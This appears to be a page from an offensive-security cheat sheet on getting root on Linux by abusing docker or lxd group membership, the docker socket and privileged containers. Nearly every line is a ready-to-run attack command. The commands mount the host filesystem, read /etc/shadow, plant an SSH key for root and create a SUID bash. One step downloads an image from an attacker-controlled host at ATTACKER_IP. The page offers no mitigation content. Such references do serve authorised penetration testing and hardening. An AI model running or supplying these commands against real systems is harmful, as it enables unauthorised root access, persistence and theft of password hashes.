Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Check Group Membership
If user is in docker or lxd group → root escalation possible.
Docker Privesc
Mount Host Filesystem
docker run -v /:/mnt --rm -it alpine chroot /mnt bash
Alternative Images
docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
docker run -v /:/mnt --rm -it debian chroot /mnt bash
If No Internet (Use Local Image)
docker images
docker run -v /:/mnt --rm -it <IMAGE_ID> chroot /mnt bash
Read Sensitive Files
docker run -v /etc/shadow:/tmp/shadow --rm alpine cat /tmp/shadow
Add SSH Key to Root
docker run -v /root:/mnt --rm -it alpine sh -c 'mkdir -p /mnt/.ssh && echo "ssh-ed25519 AAAA..." >> /mnt/.ssh/authorized_keys'
Create SUID bash
docker run -v /:/mnt --rm -it alpine sh -c 'cp /mnt/bin/bash /mnt/tmp/rootbash && chmod +s /mnt/tmp/rootbash'
Docker Socket Abuse
If /var/run/docker.sock is accessible:
ls -la /var/run/docker.sock
Via curl
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
curl -s --unix-socket /var/run/docker.sock -X POST \
-H "Content-Type: application/json" \
-d '{"Image":"alpine","Cmd":["/bin/sh"],"Binds":["/:/mnt"],"Privileged":true}' \
http://localhost/containers/create
Docker Escape (From Inside Container)
Check if Inside Container
cat /proc/1/cgroup | grep docker
ls /.dockerenv
hostname
Privileged Container Escape
# Check if privileged
cat /proc/1/status | grep Cap
# CapEff: 0000003fffffffff = privileged
fdisk -l
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host bash
LXD Privesc
Step 1 — Build Alpine Image (Attacker)
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sudo bash build-alpine
# Creates: alpine-v3.x-x86_64-XXXXXXXX_XXXX.tar.gz
Step 2 — Transfer to Target
python3 -m http.server 80
# On target:
wget http://ATTACKER_IP/alpine-v3.x-x86_64.tar.gz
Step 3 — Import and Create Container
lxc image import alpine-v3.x-x86_64.tar.gz --alias myimage
lxc init myimage privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
Step 4 — Access Host Filesystem
cd /mnt/root
cat etc/shadow
Create SUID bash
cp /mnt/root/bin/bash /mnt/root/tmp/rootbash
chmod +s /mnt/root/tmp/rootbash
Quick Reference
| Scenario | Command |
|---|
| Docker group | docker run -v /:/mnt --rm -it alpine chroot /mnt bash |
| Docker socket | Abuse via curl or docker CLI |
| Privileged container | mount /dev/sda1 /mnt && chroot /mnt |
| LXD group | Import image → mount host → root |